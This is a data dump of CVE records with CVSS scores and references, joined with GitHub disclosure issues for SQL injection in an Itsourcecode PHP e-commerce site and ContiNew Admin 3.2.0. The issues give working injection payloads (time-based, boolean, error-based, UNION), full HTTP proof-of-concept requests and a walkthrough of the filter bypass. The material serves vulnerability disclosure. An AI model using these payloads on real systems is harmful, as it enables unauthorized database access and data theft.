"modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ppp-src/ha/issues/7" }, { "source": "cna@vuldb.com", "tags": [ "Not Applicable" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275719" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.275719" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.396842" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:e-commerce_website:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9F2AFD8B-420C-4152-AE26-691362CAE64D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/ppp-src/ha/issues/7
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ppp-src", "ha" ]
# Itsourcecode "E-Commerce Website" in PHP 1.0 "search_list.php" SQL injection # NAME OF AFFECTED PRODUCT(S) + E-Commerce Website In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/e-commerce-website-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter ## Vulnerable File + search_list.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2020/12/E-commerce-Project-In-PHP-Source-Code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'search_list.php ' file of the 'E-Commerce Website' project. The reason for this issue is that attackers inject malicious code from the parameter "username" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + During the security review of the PHP "E-Commerce Website", "xxx" discovered a critical SQL injection vulnerability in the "search_list.php " file. This vulnerability stems from insufficient user input validation of the "user" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC --- POST /search_list.php HTTP/1.1 Host: 192.168.1.108:98 Content-Length: 10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.108:98 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.108:98/system_list2.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=lpqq2adhvnpc9800mplg0j61ic Connection: close search=122 --- ## Vulnerability type: + time-based blind + boolean-based blind + error-based + UNION query ## Vulnerability location: + 'search' parameter ## Payload: --- Parameter: search (POST) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: search=122') AND EXTRACTVALUE(1479,CASE WHEN (1479=1479) THEN 1479 ELSE 0x3A END)-- FxJd Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: search=122') AND GTID_SUBSET(CONCAT(0x717a6a7a71,(SELECT (ELT(3216=3216,1))),0x716b7a7a71),3216)-- arPz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: search=122') AND (SELECT 9304 FROM (SELECT(SLEEP(5)))nNwV)-- tjKK Type: UNION query Title: MySQL UNION query (NULL) - 18 columns Payload: search=122') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a6a7a71,0x4b77686246666f50616e6a59474d706b664143674b4d476d4770747a744462484d5571416475766f,0x716b7a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- + ![1](https://github.com/user-attachments/assets/65605bfd-6cf2-41c3-9f19-e0e8aacc23fe) ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: +![2](https://github.com/user-attachments/assets/62c7e5e1-7d4d-4680-b46f-296bb84083ca) +![3](https://github.com/user-attachments/assets/2929f1cf-47d9-4bff-865b-55f584340654) +![4](https://github.com/user-attachments/assets/44693ee6-38d2-4072-8ea0-31d2b008aac0) # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Itsourcecode "E-Commerce Website" in PHP 1.0 "search_list.php" SQL injection
https://api.github.com/repos/ppp-src/ha/issues/7/comments
0
2024-08-23T08:56:49Z
2024-08-23T08:56:49Z
https://github.com/ppp-src/ha/issues/7
2,482,662,465
7
6,211
CVE-2024-8150
2024-08-25T22:15:05.310
A vulnerability was found in ContiNew Admin 3.2.0 and classified as critical. Affected by this issue is the function top.continew.starter.extension.crud.controller.BaseController#page of the file /api/system/user?deptId=1&page=1&size=10. The manipulation of the argument sort leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "HIGH", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Chiexf/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275738" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275738" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.391229" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:continew:continew_admin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "3504E98B-9616-4544-A4F3-3603A49AB49C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Chiexf/cve/issues/2
[ "Exploit", "Issue Tracking" ]
github.com
[ "Chiexf", "cve" ]
### Summary _The controllable `sort` parameter has led to SQL injection in Continue Admin v3.2.0._ ### Environment Setup _Build the backend code locally by downloading "https://github.com/continew-org/continew-admin"._ _Build the front-end page locally by downloading "https://github.com/continew-org/continew-admin-ui"._ ### Submitter Chiexf ### Details The vulnerability exists in “http://127.0.0.1:5173/api/system/user?deptId=1&page=1&size=10&sort=t1.createTime%2Cdesc” interface. The main reason is that the sort parameter is controllable, leading to order by injection. The parameter `pageQuery` is passed in the ```top.continew.starter.extension.crud.controller.BaseController#page``` method ``` public R<PageResp<L>> page(Q query, @Validated PageQuery pageQuery) { this.checkPermission(Api.LIST); return R.ok(baseService.page(query, pageQuery)); } ``` At the ```top.continew.admin.system.service.impl.UserServiceImpl#page``` method, use the ```topage()``` method to convert the ```pageQuery``` parameter into a paging condition ``` public PageResp<UserResp> page(UserQuery query, PageQuery pageQuery) { QueryWrapper<UserDO> queryWrapper = this.buildQueryWrapper(query); IPage<UserDetailResp> page = baseMapper.selectUserPage(pageQuery.toPage(), queryWrapper); PageResp<UserResp> pageResp = PageResp.build(page, super.getListClass()); pageResp.getList().forEach(this::fill); return pageResp; } ``` Due to incomplete keyword filtering of parameters by the ```setColumn()``` method in ```topage()```, it is possible to bypass it ``` public <T> IPage<T> toPage() { Page<T> mybatisPage = new Page<>(this.getPage(), this.getSize()); Sort pageSort = this.getSort(); if (CollUtil.isNotEmpty(pageSort)) { for (Sort.Order order : pageSort) { OrderItem orderItem = new OrderItem(); orderItem.setAsc(order.isAscending()); orderItem.setColumn(CharSequenceUtil.toUnderlineCase(order.getProperty())); mybatisPage.addOrder(orderItem); } } return mybatisPage; } ``` ``` public OrderItem setColumn(String column) { this.column = StringUtils.replaceAllBlank(column); return this; } public static String replaceAllBlank(String str) { Matcher matcher = REPLACE_BLANK.matcher(str); return matcher.replaceAll(""); } private static final Pattern REPLACE_BLANK = Pattern.compile("'|\"|\\<|\\>|&|\\*|\\+|=|#|-|;|\\s*|\t|\r|\n"); ``` ### PoC After logging in, then click User Management in System Administration. ![image](https://github.com/user-attachments/assets/d876176a-dc71-4cbe-99cd-1ae3d3e29778) Changing the parameter of sort to ```(sleep(ASCII(substr((SELECT(MD5(1)))FROM(1)FOR(1)))like(99)))%2Cdesc``` can cause delay ![image](https://github.com/user-attachments/assets/e3467837-c3d2-49c2-b28e-bc794a1fe6c1) ``` GET /api/system/user?deptId=1&page=1&size=10&sort=(sleep(ASCII(substr((SELECT(MD5(1)))FROM(1)FOR(1)))like(99)))%2Cdesc HTTP/1.1 Host: 127.0.0.1:5173 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOjEsInJuU3RyIjoiQ3FaMGVRbm5mQm5ZYUhHV0tkMXA3Y1Zxd0ozcHloWFQifQ.-RWFOkVPVvBw96B3cFVmtD5PqmVEdWil1hta0MqoAlc Connection: close Referer: http://127.0.0.1:5173/system/user Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin ``` ### Impact _Can retrieve data from the database_
Continew Admin V3.2.0 Presence of SQL Injection_1
https://api.github.com/repos/Chiexf/cve/issues/2/comments
0
2024-08-14T03:09:23Z
2024-08-14T14:53:56Z
https://github.com/Chiexf/cve/issues/2
2,464,797,988
2
6,212
CVE-2024-8155
2024-08-25T23:15:04.123
A vulnerability classified as critical was found in ContiNew Admin 3.2.0. Affected by this vulnerability is the function top.continew.starter.extension.crud.controller.BaseController#tree of the file /api/system/dept/tree?sort=parentId%2Casc&sort=sort%2Casc. The manipulation of the argument sort leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.4, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.1, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "HIGH", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Chiexf/cve/issues/3" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275743" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.275743" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.391851" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:continew:admin:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C339F881-93D0-46ED-89B4-B8FA0E22E861", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Chiexf/cve/issues/3
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Chiexf", "cve" ]
### Summary _The controllable `sort` parameter has led to SQL injection in Continue Admin v3.2.0._ ### Environment Setup _Build the backend code locally by downloading "https://github.com/continew-org/continew-admin"._ _Build the front-end page locally by downloading "https://github.com/continew-org/continew-admin-ui"._ ### Details The vulnerability exists in "http://localhost:5173/api/system/dept/tree?sort=parentId%2Casc&sort=sort%2Casc&sort=createTime%2Cdesc" interface. The main reason is that the `sort` parameter is controllable, leading to order by injection. The `sortQuery` parameter was passed in the `top.continew.starter.extension.crud.controller.BaseController#tree` method ``` @GetMapping("/tree") public R<List<Tree<Long>>> tree(Q query, SortQuery sortQuery) { this.checkPermission(Api.LIST); return R.ok(baseService.tree(query, sortQuery, false)); } ``` At `top.continew.starter.extension.crud.service.impl.BaseServiceImpl#tree` method, the `list()` method is called and the `sortQuery` parameter is passed in ``` @Override public List<Tree<Long>> tree(Q query, SortQuery sortQuery, boolean isSimple) { List<L> list = this.list(query, sortQuery); if (CollUtil.isEmpty(list)) { return new ArrayList<>(0); } // 如果构建简单树结构,则不包含基本树结构之外的扩展字段 TreeNodeConfig treeNodeConfig = TreeUtils.DEFAULT_CONFIG; TreeField treeField = this.getListClass().getDeclaredAnnotation(TreeField.class); if (!isSimple) { // 根据 @TreeField 配置生成树结构配置 treeNodeConfig = TreeUtils.genTreeNodeConfig(treeField); } // 构建树 return TreeUtils.build(list, treeNodeConfig, (node, tree) -> { // 转换器 tree.setId(ReflectUtil.invoke(node, CharSequenceUtil.genGetter(treeField.value()))); tree.setParentId(ReflectUtil.invoke(node, CharSequenceUtil.genGetter(treeField.parentIdKey()))); tree.setName(ReflectUtil.invoke(node, CharSequenceUtil.genGetter(treeField.nameKey()))); tree.setWeight(ReflectUtil.invoke(node, CharSequenceUtil.genGetter(treeField.weightKey()))); if (!isSimple) { List<Field> fieldList = ReflectUtils.getNonStaticFields(this.getListClass()); fieldList.removeIf(f -> CharSequenceUtil.equalsAnyIgnoreCase(f.getName(), treeField.value(), treeField .parentIdKey(), treeField.nameKey(), treeField.weightKey(), treeField.childrenKey())); fieldList.forEach(f -> tree.putExtra(f.getName(), ReflectUtil.invoke(node, CharSequenceUtil.genGetter(f .getName())))); } }); } ``` At `top.continew.starter.extension.crud.service.impl.BaseServiceImpl#list` method, call the `sort` method to configure the sorting conditions ``` protected <E> List<E> list(Q query, SortQuery sortQuery, Class<E> targetClass) { QueryWrapper<T> queryWrapper = this.buildQueryWrapper(query); // 设置排序 this.sort(queryWrapper, sortQuery); List<T> entityList = baseMapper.selectList(queryWrapper); if (super.getEntityClass() == targetClass) { return (List<E>)entityList; } return BeanUtil.copyToList(entityList, targetClass); } ``` In the `top.continew.starter.extension.crud.service.impl.BaseServiceImpl#sort` method, we can see that there are two ways to obtain the `checkProperty` parameter. If the field name contains the `.` symbol, the string will be split and the last part will be used as `checkProperty`. Then it will be determined whether `checkProperty` is valid as a sorting field, and then it will be decided whether to add it to the sorting field. In other words, as long as the field after the `.` symbol meets the sorting field, we can bypass the detection, so we can construct the parameter before the `.` symbol to cause order by injection. ``` protected void sort(QueryWrapper<T> queryWrapper, SortQuery sortQuery) { Sort sort = Opt.ofNullable(sortQuery).orElseGet(SortQuery::new).getSort(); for (Sort.Order order : sort) { if (null != order) { String property = order.getProperty(); String checkProperty; // 携带表别名则获取 . 后面的字段名 if (property.contains(StringConstants.DOT)) { checkProperty = CollUtil.getLast(CharSequenceUtil.split(property, StringConstants.DOT)); } else { checkProperty = property; } Optional<Field> optional = super.getEntityFields().stream() .filter(field -> checkProperty.equals(field.getName())) .findFirst(); ValidationUtils.throwIf(optional.isEmpty(), "无效的排序字段 [{}]", property); queryWrapper.orderBy(true, order.isAscending(), CharSequenceUtil.toUnderlineCase(property)); } } } ``` ### PoC After logging in, then click on Department Management in System Administration. ![image](https://github.com/user-attachments/assets/2b98cccd-865d-44bb-8f77-12bb4a0fa118) Changing the parameter of sort to `(sleep(ASCII(substr((SELECT(MD5(1)))FROM(1)FOR(1)))like(99)))--+.createTime%2Cdesc` can cause delay ![image](https://github.com/user-attachments/assets/6208e8fe-c045-48f0-a27c-30ff71ccaff9) ``` GET /api/system/dept/tree?sort=parentId%2Casc&sort=sort%2Casc&sort=(sleep(ASCII(substr((SELECT(MD5(1)))FROM(1)FOR(1)))like(99)))--+.createTime%2Cdesc HTTP/1.1 Host: localhost:5173 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpblR5cGUiOiJsb2dpbiIsImxvZ2luSWQiOjEsInJuU3RyIjoiRnpsbWNzZVNIZHhqUU92alFnODhpVGJwTHpqTnlUd2YifQ.sNU-1W3dRm8KTH1wF9QL6YYb3NYKCuFwxAW8Gl2OjmM Connection: close Referer: http://localhost:5173/system/dept Cookie: Idea-32a85cc7=e3f6abdb-76b1-4705-8336-db3d78f7aa3c Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin ``` ### Impact _Can retrieve data from the database_
Continew Admin V3.2.0 Presence of SQL Injection_2
https://api.github.com/repos/Chiexf/cve/issues/3/comments
0
2024-08-14T11:39:03Z
2024-08-15T15:19:19Z
https://github.com/Chiexf/cve/issues/3
2,465,601,895
3
6,213
CVE-2024-8167
2024-08-26T15:15:09.593
A vulnerability was found in code-projects Job Portal 1.0. It has been classified as critical. Affected is an unknown function of the file /forget.php. The manipulation of the argument email/mobile leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/t4rrega/cve/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275766" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.397714" } ]
